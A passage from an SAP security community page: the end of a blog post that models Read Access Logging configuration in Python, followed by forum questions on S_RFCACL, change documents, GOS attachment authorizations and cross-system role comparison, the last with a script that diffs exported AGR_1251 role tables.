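    exclude_if_initial: bool = False  # True corresponds to "Exclude if initial"


@dataclass(frozen=True)
class RalConfig:
    context_fields: tuple      # log context: fields that identify the record
    log_group: tuple           # LogGroupField entries to log per access
    excluded_users: frozenset  # condition: accesses by these users are not logged


# Simplified view of ABAP initial values for the common field types
INITIAL_VALUES = {"", "0", "00000000", "000000", None}


def ral_record(cfg: RalConfig, access: dict) -> Optional[dict]:
    """Return the log entry for one screen access, or None if it is not logged."""
    # Condition: excluded users produce no log entry at all
    if access["user"] in cfg.excluded_users:
        return None
    entry = {
        "user": access["user"],
        "tcode": access["tcode"],
        # Context fields identify the business object and need no log-group entry
        "context": {f: access["fields"].get(f) for f in cfg.context_fields},
        "fields": {},
    }
    for lf in cfg.log_group:
        value = access["fields"].get(lf.name)
        if lf.exclude_if_initial and value in INITIAL_VALUES:
            continue  # initial value: skip the field to save space
        # "Without Value": record the access, but never store the data itself
        entry["fields"][lf.name] = value if lf.with_value else "<accessed, value not logged>"
    return entry


# Constructed configuration for a customer display screen. The bank account
# is logged without value so the RAL tables never hold a copy of the number.
CONFIG = RalConfig(
    context_fields=("KUNNR",),
    log_group=(
        LogGroupField("NAME1"),
        LogGroupField("BANKN", with_value=False),
        LogGroupField("TELF1", exclude_if_initial=True),
    ),
    excluded_users=frozenset({"ABCUSER"}),
)

# Constructed sample accesses: one by the excluded user, one by a normal user
ACCESSES = [
    {"user": "ABCUSER", "tcode": "ZCUST_DISP",
     "fields": {"KUNNR": "0000100001", "NAME1": "Acme", "BANKN": "12345678", "TELF1": ""}},
    {"user": "JDOE", "tcode": "ZCUST_DISP",
     "fields": {"KUNNR": "0000100002", "NAME1": "Globex", "BANKN": "87654321", "TELF1": ""}},
]


def run(cfg: RalConfig = CONFIG, accesses: list = ACCESSES) -> list:
    """Apply the configuration to all accesses and return the stored log entries."""
    return [rec for rec in (ral_record(cfg, a) for a in accesses) if rec is not None]


if __name__ == "__main__":
    for rec in run():
        print(rec)
```

Running it shows a single entry for JDOE: the customer number appears as context, NAME1 is stored with its value, BANKN is recorded as accessed but without the number, and the empty TELF1 is dropped; the access by ABCUSER leaves no trace, which is exactly why exclusion conditions should be granted sparingly.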


Conclusion:

This is the basic end-to-end configuration for a sample application. The scope can be extended with additional log contexts, log groups and conditions, depending on the application being logged. A Web Dynpro application can be configured with the same approach.


Regards,

Naveen Inuganti


S_RFCACL not editable in release 701?


Hello,

 

We're currently doing an upgrade from Release 700, SP-Level 014, to Release 701, SP-Level 016.

 

In our CRM system, I'm trying to edit the authorization object S_RFCACL so I can add new SIDs. I'm having particular issues with the field RFC_SYSID.

 

The problem I'm getting is:

 

1) The object isn't allowing me to enter any values, and won't display existing values

2) The object parameter options are completely different from the previous version.

 

Here are screenshots of the options in the previous version compared to the new version.

 

Old parameter options:

CHD_S_RFCACL.jpg

 

New parameter options:

CHU_S_RFCACL.jpg

 

Can anyone advise what needs to be done to get this working? Is there a note that needs to be applied?

 

Much appreciated.

 

Cheers, Paul

User type changes are not shown in change document


I have observed this strange behavior in my system: the change document is not shown when I run the report for the attribute 'user type', even though the user type has actually been changed. This happens for the output type 'change history list'. For other output types the result is shown. How can I fix this?

Best way to control display authorizations to GOS (attachment list) in XK03


Hello All

 

Purpose: prevent users from accessing confidential attachments in XK03 which contain bank account details, SSN etc. I tried to check through all existing forums, solutions etc., but please pardon me if there is an obvious solution that I might have missed.

 

I tried multiple approaches:

 

(1) Option A is to secure at source: when the vendor admin is uploading the attachment containing SSN details, make sure to mask/block/encrypt it, whatever it takes to not make the SSN available for general consumption.

 

(2) Option B - OB23 -> this seems to help to suppress data at field level, while we are focusing specifically on attachments.

 

(3) Object F_LFA1_GRP -> vendor account group - can we create an account group for confidential vendors? -> potentially not an option, as I understand all account groups can have confidential attachments; again, it's not about restricting access to account group information, just the attachments across all account groups.

 

(4) F_LFA1_BUK - on the basis of company code - seems not relevant, as the behavior of authorization access to GOS should remain consistent across all company codes.

 

(5) S_GUI -> seems plausible - if a user doesn't have authorization to download/upload/print, they can't actually view the attachments, since they can neither upload/download/print nor display from the attachment list option.

 

But this object is too generic to be used for a particular t-code, and one solution with the least amount of customization is to link the XK02/XK03 GOS functionality with a custom S_GUI (though I know the sound of "custom S_GUI" isn't pleasing at all) which doesn't allow document upload/download/print for users who should only have XK03 access, while providing access to vendor admins who need to upload attachments via XK02.

 

(6) S_OC_ROLE - this object allows adding/deleting attachments for a user in GOS, but you can only upload if you have S_GUI and can really view only if you have S_GUI (it seems I am on a remote desktop - would that be a reason that S_GUI is coming into play so heavily? I don't think so - thinking out loud).

 

(7) S_GOS_ATT - this is the first authorization object to be checked for authorization to change/delete attachments from the attachment list, and if a user doesn't have this object then the next check is placed on S_OC_ROLE, as per my investigation (SAP Notes 1293080 and 1539457). This object only has 02/06 at activity level.

 

So based on my initial research, the most suitable solution at this stage involves creating a custom S_GUI, only giving vendor admins access to this object, modifying the GOS function module for XK02/XK03 to place an authority check on this object, updating SU24 (all the usual standard steps etc.), and not allowing XK03-only users (i.e. users who are only meant to display and are not vendor admins) to have S_GOS_ATT for object LFA1 (vendor data), and also not allowing them access to S_OC_ROLE, so that they don't delete any uploaded attachments even by mistake.

 

A still better and more natural solution would have been to add activity 03 to object S_GOS_ATT and allow display of data only through this object. I'm thinking whether I should raise an SAP OSS incident to ask for this functionality?

 

Please share your experiences/approach and thanks for your time!

Role Comparison Cross System - alternatives to RSUSR050


Hello Experts,

 

Would there be an alternative for cross-system role comparison other than using RSUSR050?

We have a variety of landscapes and are on different Basis levels. SAP Notes have corrected all but one, which is on an older release level; the business is not ready to upgrade this one.

 

I have dabbled with the SCMP t-code, but the results are not clear or complete. I was using tables AGR_1250 and AGR_1251.

Any thoughts appreciated.

 

Dan.
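When RSUSR050 is not usable on one side, the comparison can be done outside the SAP systems by exporting the role tables the post mentions and diffing them. The following Python script is an added example, not part of the original post and not an SAP-delivered tool. It assumes tab-separated exports of AGR_1251 from each system containing the columns AGR_NAME, OBJECT, AUTH, FIELD, LOW, HIGH and DELETED (the column selection is an assumption about how the export was produced), and the two extracts embedded in it are constructed sample data.

```python
"""Compare role authorization field values exported from two systems.

Added example, not an SAP tool. Assumes tab-separated exports of table
AGR_1251 with the columns AGR_NAME, OBJECT, AUTH, FIELD, LOW, HIGH and
DELETED. The two extracts below are constructed sample data.
"""
import csv
import io

# Constructed extract from system DEV
DEV_AGR_1251 = (
    "AGR_NAME\tOBJECT\tAUTH\tFIELD\tLOW\tHIGH\tDELETED\n"
    "Z_FI_DISPLAY\tS_TCODE\tT-D0000001\tTCD\tFB03\t\t\n"
    "Z_FI_DISPLAY\tF_BKPF_BUK\tT-D0000002\tACTVT\t03\t\t\n"
    "Z_FI_DISPLAY\tF_BKPF_BUK\tT-D0000002\tBUKRS\t1000\t1999\t\n"
    "Z_FI_DISPLAY\tS_TCODE\tT-D0000003\tTCD\tFB02\t\tX\n"  # flagged deleted
)

# Constructed extract from system PRD: same role, but wider than intended
PRD_AGR_1251 = (
    "AGR_NAME\tOBJECT\tAUTH\tFIELD\tLOW\tHIGH\tDELETED\n"
    "Z_FI_DISPLAY\tS_TCODE\tT-P0000001\tTCD\tFB03\t\t\n"
    "Z_FI_DISPLAY\tF_BKPF_BUK\tT-P0000002\tACTVT\t03\t\t\n"
    "Z_FI_DISPLAY\tF_BKPF_BUK\tT-P0000002\tACTVT\t02\t\t\n"
    "Z_FI_DISPLAY\tF_BKPF_BUK\tT-P0000002\tBUKRS\t*\t\t\n"
)


def load_auth_values(extract: str, ignore_auth: bool = True) -> set:
    """Return the set of authorization field values in an AGR_1251 extract.

    Rows flagged DELETED = 'X' are skipped. The AUTH column (the generated
    authorization instance name) is dropped by default, because roles that were
    generated separately in each system carry different instance names and
    would otherwise show up as differences although the values are identical.
    """
    reader = csv.DictReader(io.StringIO(extract), delimiter="\t")
    values = set()
    for row in reader:
        if row["DELETED"].strip() == "X":
            continue
        key = (row["AGR_NAME"], row["OBJECT"], row["FIELD"], row["LOW"], row["HIGH"])
        if not ignore_auth:
            key = key[:2] + (row["AUTH"],) + key[2:]
        values.add(key)
    return values


def compare_roles(left: str, right: str, ignore_auth: bool = True) -> dict:
    """Diff two extracts and report values present on only one side."""
    a = load_auth_values(left, ignore_auth)
    b = load_auth_values(right, ignore_auth)
    return {
        "only_in_left": sorted(a - b),
        "only_in_right": sorted(b - a),
        "common": len(a & b),
    }


if __name__ == "__main__":
    result = compare_roles(DEV_AGR_1251, PRD_AGR_1251)
    print("identical field values:", result["common"])
    for side in ("only_in_left", "only_in_right"):
        for role, obj, fld, low, high in result[side]:
            print(f"{side}: {role} {obj} {fld} = {low}" + (f"-{high}" if high else ""))
```

On the sample data the diff surfaces exactly what a cross-system comparison is for: PRD grants ACTVT 02 and BUKRS * for F_BKPF_BUK where DEV only has ACTVT 03 for company codes 1000-1999, while the deleted FB02 row in DEV is correctly ignored. Run with ignore_auth=False to see why the AUTH column is dropped by default: every row then differs only because of the instance names.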
